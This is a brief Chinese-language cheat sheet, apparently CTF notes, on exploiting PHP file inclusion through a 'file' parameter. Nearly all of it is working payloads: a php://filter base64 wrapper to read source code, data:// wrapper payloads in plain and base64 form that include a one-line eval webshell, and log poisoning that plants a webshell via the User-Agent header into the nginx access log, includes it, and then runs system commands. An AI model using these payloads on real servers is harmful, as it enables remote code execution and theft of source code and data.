直接读

?file=php://filter/read=convert.base64-encode/resource=

过滤php

考虑data方式
data://
数据流构造器,将读取后面base编码字符串后解码的数据作为数据流的输入
包含木马

?file=data://text/plain,<?php @eval($_POST['cmd'])?>
?file=data://text/plain;base64,PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk/Pg==

随后紧跟一个post传参即可

日志

先想办法 随便 写一个一句话木马进去<?php eval($_POST[1]);?> 比如传参 或者ua头里 插入日志
然后包含进

/var/log/nginx/access.log

之后传递 1=system('');命令即可